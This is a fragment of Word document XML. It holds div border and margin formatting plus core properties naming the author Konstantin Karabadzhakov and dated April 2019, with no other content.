                                                                    <w:top w:val="single" w:sz="6" w:space="5" w:color="2D3031"/>
                                                                    <w:left w:val="single" w:sz="6" w:space="6" w:color="2D3031"/>
                                                                    <w:bottom w:val="single" w:sz="6" w:space="5" w:color="2D3031"/>
                                                                    <w:right w:val="single" w:sz="6" w:space="6" w:color="2D3031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226797">
                                                          <w:marLeft w:val="150"/>
                                                          <w:marRight w:val="0"/>
                                                          <w:marTop w:val="105"/>
                                                          <w:marBottom w:val="60"/>
                                                          <w:divBdr>
                                                            <w:top w:val="single" w:sz="6" w:space="5" w:color="2D3031"/>
                                                            <w:left w:val="single" w:sz="6" w:space="6" w:color="2D3031"/>
                                                            <w:bottom w:val="single" w:sz="6" w:space="5" w:color="2D3031"/>
                                                            <w:right w:val="single" w:sz="6" w:space="6" w:color="2D3031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42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1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27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9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34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0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33F44"/>
                                                                    <w:left w:val="single" w:sz="6" w:space="4" w:color="333F44"/>
                                                                    <w:bottom w:val="single" w:sz="6" w:space="4" w:color="333F44"/>
                                                                    <w:right w:val="single" w:sz="6" w:space="4" w:color="333F4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Karabadzhakov</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Konstantin Karabadzhakov</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-04-16T17:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-04-16T17:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>